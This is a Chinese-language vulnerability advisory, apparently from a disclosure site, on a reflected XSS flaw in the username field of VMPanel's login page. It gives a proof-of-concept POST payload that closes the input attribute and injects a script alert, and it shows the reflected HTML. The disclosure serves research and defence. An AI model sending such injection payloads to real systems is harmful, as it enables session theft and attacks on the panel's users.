VMPanel cybervm 登录处 参数username 反射型XSS漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

###0x01 漏洞简介 VMPanel是一个强大基于Web服务的VMware Esx/Esxi控制面板,用户可以远程创建或者删除虚拟机。 官网: ``` http://cybervm.com/ ``` ![](https://images.seebug.org/contribute/8697aa00-ea57-456a-9e50-eca9b76e0125) VMPanel在登录页面的用户名输入框由于过滤不严,导致出现XSS漏洞。 ###0x02 漏洞分析 以http://cybervm.com:2023为例: ``` http://cybervm.com:2023/index.php?act=login ``` ![](https://images.seebug.org/contribute/1d60607d-3da4-41ea-b20b-2cf66d317883) 构造POST参数: ``` username=test"><script>alert(/xss/)</script><a id=" &password=test &login=Login ``` 发送请求: ![](https://images.seebug.org/contribute/cbc08052-eaa6-4246-80a5-9ebdf4dc0c32) 查看下用户名输入框: ![](https://images.seebug.org/contribute/39115ea6-cce5-4e54-8ccf-8b074cf24562) ``` <input class="form-control form-control1 input-lg" placeholder="Username" name="username" id="username" value="test" type="text"><script>alert(/xss/)</script><a id="”></a> ``` 提交的payload刚好闭合了html,并且成功嵌入了js代码,导致XSS漏洞的产生。

0%
暂无可用Exp或PoC
当前有0条受影响产品信息